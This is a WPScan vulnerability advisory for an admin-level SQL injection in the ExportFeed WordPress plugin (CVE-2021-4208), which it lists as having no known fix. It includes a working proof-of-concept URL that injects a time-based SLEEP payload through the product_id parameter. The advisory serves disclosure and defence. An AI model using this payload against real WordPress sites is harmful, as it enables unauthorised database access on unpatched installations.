WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

ExportFeed <= 2.0.1.0 - Admin+ SQL Injection

Description

The plugin does not sanitise and escape the product_id POST parameter before using it in a SQL statement, leading to a SQL injection vulnerability exploitable by high privilege users

Proof of Concept

https://example.com/wp-admin/admin-ajax.php?feedpath=core/ajax/wp/fetch_product_ajax.php&action=ebcpf_ebayseller_handles&security=1c6e01b2a4&category=&sku=snake&merchat_type=eBaySeller&service_name=eBaySeller&showOutofStock=1&limit=0,&q=savep&local_cat_ids=1&product_id=1+AND+(SELECT+9979+FROM+(SELECT(SLEEP(5)))IHgj)

Affects Plugins

exportfeed-list-woocommerce-products-on-ebay-store
No known fix - plugin closed

References

CVE
CVE-2021-4208

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

0xdecafbad

Submitter

0xdecafbad

Verified

Yes

WPVDB ID
0cf63b44-f709-4ba4-be14-1eea934c2007

Timeline

Publicly Published

2021-11-22 (about 10 months ago)

Added

2022-01-21 (about 8 months ago)

Last Updated

2022-04-12 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin